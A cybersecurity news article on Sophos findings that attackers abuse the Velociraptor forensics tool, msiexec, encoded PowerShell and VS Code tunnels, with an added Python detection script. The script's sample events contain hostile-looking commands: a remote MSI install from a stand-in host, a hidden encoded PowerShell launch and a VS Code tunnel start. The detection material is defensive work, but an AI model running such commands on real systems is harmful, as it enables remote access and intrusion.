Red Hot Cyber


Living-off-the-Land 2.0: When Attackers Weaponize Security Tools

Redazione RHC : 1 September 2025 17:23

Sophos has warned of an increasingly sophisticated attacker practice: the use of legitimate cybersecurity tools as part of a Living-off-the-Land (LotL) tactic, in which an attack is carried out using existing or publicly available software rather than internally developed malware.

In a recent incident, unknown attackers introduced Velociraptor, an open-source endpoint monitoring and digital forensics tool, into the victim’s infrastructure. The tool was installed via msiexec, downloading the MSI installer from a domain on the Cloudflare Workers platform.

It’s well known that threat actors often use “living-off-the-land” (LotL) techniques or exploit legitimate remote monitoring and management (RMM) tools for their attacks. However, the use of Velociraptor reveals a clear strategic shift, where incident response software is being used to gain an advantage while simultaneously reducing the need to deploy purpose-built malware.

The investigation into the incident revealed that the attackers used the built-in Windows msiexec utility to retrieve an MSI installation package from a Cloudflare Workers domain. This MSI package served as the foundation for the other tools the attackers deployed, including a Cloudflare tunneling application and the remote administration software Radmin.

The MSI file installs Velociraptor, which then establishes contact with a second Cloudflare Workers domain. That access is then used to download Visual Studio Code from the same staging server via an encoded PowerShell command and to run the source code editor with its tunnel option enabled, giving the attackers both remote access and remote code execution.
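The chain described above (remote MSI fetched by msiexec, an unexpected Velociraptor agent, an encoded PowerShell launch, VS Code started in tunnel mode) maps cleanly onto process-creation telemetry. The following detection sketch is an added example, not code from the article or from Sophos: it evaluates four rules over constructed Sysmon-style events and then correlates hits per host so that the sequence, rather than any single process, raises the alarm. The `EXPECTED_VELOCIRAPTOR_IMAGES` allowlist and all hostnames, paths and timestamps are assumptions made up for the example.

```python
"""Detection sketch for the msiexec -> Velociraptor -> VS Code tunnel chain.
Added example; events below are constructed, not real telemetry."""
import re
from datetime import datetime

# Hypothetical: where this organisation's own Velociraptor agent is expected to run from.
# Any Velociraptor binary started from elsewhere is treated as unexpected.
EXPECTED_VELOCIRAPTOR_IMAGES = {r"c:\program files\velociraptor\velociraptor.exe"}

# Constructed process-creation events (Sysmon EID 1 style, trimmed to the fields used).
# The base64 after -enc is a placeholder ("ABCDEFGHIJKLMNOP"), not a real payload.
SAMPLE_EVENTS = [
    {"ts": "2025-08-30T10:01:12Z", "host": "ws-017", "user": "CORP\\jdoe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": "msiexec.exe /i https://staging.example.workers.dev/agent.msi /qn"},
    {"ts": "2025-08-30T10:01:40Z", "host": "ws-017", "user": "NT AUTHORITY\\SYSTEM",
     "image": r"C:\ProgramData\vrsvc\velociraptor.exe",
     "cmdline": "velociraptor.exe --config client.config.yaml client"},
    {"ts": "2025-08-30T10:04:05Z", "host": "ws-017", "user": "NT AUTHORITY\\SYSTEM",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc QUJDREVGR0hJSktMTU5PUA=="},
    {"ts": "2025-08-30T10:04:30Z", "host": "ws-017", "user": "NT AUTHORITY\\SYSTEM",
     "image": r"C:\Users\jdoe\AppData\Local\Programs\Microsoft VS Code\code.exe",
     "cmdline": "code.exe tunnel --accept-server-license-terms"},
    # Benign activity on another host: local MSI install and a normal editor launch.
    {"ts": "2025-08-30T10:05:00Z", "host": "ws-023", "user": "CORP\\asmith",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": "msiexec.exe /i C:\\Temp\\7zip.msi /qn"},
    {"ts": "2025-08-30T10:06:00Z", "host": "ws-023", "user": "CORP\\asmith",
     "image": r"C:\Users\asmith\AppData\Local\Programs\Microsoft VS Code\code.exe",
     "cmdline": "code.exe C:\\repo\\main.py"},
]


def _basename(image):
    return image.replace("\\", "/").rsplit("/", 1)[-1].lower()


def _parse_ts(ts):
    return datetime.fromisoformat(ts.replace("Z", "+00:00"))


# Rule 1: msiexec installing straight from a URL rather than a local package.
def msiexec_remote_install(ev):
    return _basename(ev["image"]) == "msiexec.exe" and re.search(r"https?://", ev["cmdline"], re.I) is not None


# Rule 2: a Velociraptor binary running from outside the sanctioned deployment path.
def unexpected_velociraptor(ev):
    return "velociraptor" in _basename(ev["image"]) and ev["image"].lower() not in EXPECTED_VELOCIRAPTOR_IMAGES


# Rule 3: PowerShell launched with an encoded command (-e / -ec / -enc / -EncodedCommand).
def encoded_powershell(ev):
    return (_basename(ev["image"]) in {"powershell.exe", "pwsh.exe"}
            and re.search(r"\s-(?:e|ec|enc|encodedcommand)\s", ev["cmdline"], re.I) is not None)


# Rule 4: VS Code started in tunnel mode, which exposes a remote shell through Microsoft's relay.
def vscode_tunnel(ev):
    return _basename(ev["image"]) == "code.exe" and re.search(r"\btunnel\b", ev["cmdline"], re.I) is not None


RULES = {
    "msiexec_remote_install": msiexec_remote_install,
    "unexpected_velociraptor": unexpected_velociraptor,
    "encoded_powershell": encoded_powershell,
    "vscode_tunnel": vscode_tunnel,
}


def evaluate(events):
    """Run every rule over every event; return one alert per (event, rule) hit."""
    alerts = []
    for ev in events:
        for name, predicate in RULES.items():
            if predicate(ev):
                alerts.append({"rule": name, "ts": ev["ts"], "host": ev["host"], "cmdline": ev["cmdline"]})
    return alerts


def correlate(alerts, window_seconds=3600):
    """Per host: a remote msiexec install followed within the window by at least two
    other rules firing is reported as one chain, so the sequence is what escalates."""
    by_host = {}
    for a in alerts:
        by_host.setdefault(a["host"], []).append(a)
    chains = []
    for host, hits in by_host.items():
        hits.sort(key=lambda a: _parse_ts(a["ts"]))
        for i, first in enumerate(hits):
            if first["rule"] != "msiexec_remote_install":
                continue
            t0 = _parse_ts(first["ts"])
            followers = {h["rule"] for h in hits[i + 1:]
                         if (_parse_ts(h["ts"]) - t0).total_seconds() <= window_seconds}
            if len(followers) >= 2:
                chains.append({"host": host, "start": first["ts"], "rules": sorted(followers | {first["rule"]})})
    return chains


if __name__ == "__main__":
    hits = evaluate(SAMPLE_EVENTS)
    for a in hits:
        print(f'{a["ts"]} {a["host"]} {a["rule"]}: {a["cmdline"]}')
    for c in correlate(hits):
        print("CHAIN", c)
```

Each rule alone is noisy in a real estate (administrators install from URLs, developers use encoded commands); the value is in `correlate`, which only escalates when the remote install is followed by the rest of the pattern on the same host. Feed it real Sysmon or EDR process events and tune the Velociraptor allowlist to your own deployment.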

Similar techniques involving remote access tools have been linked to ransomware groups like Black Basta since mid-2024. These more recent campaigns forgo the preliminary email bombing phase and ultimately leverage remote access to deliver a PowerShell payload with capabilities commonly associated with credential theft, persistence, and remote code execution.

These attacks begin with threat actors using newly created or compromised tenants to send direct messages or initiate calls to targets, impersonating IT help desk staff or other trusted contacts, in order to persuade victims to install remote access software such as AnyDesk, DWAgent, or Quick Assist, after which the attackers take control of the systems to spread malware.

Windows credentials can also be harvested through these attacks: users are prompted to enter their passwords in what looks like an innocuous system setup request, and the credentials are then collected and stored in a text file on the system.

Redazione
The editorial team of Red Hot Cyber consists of a group of individuals and anonymous sources who actively collaborate to provide early information and news on cybersecurity and computing in general.
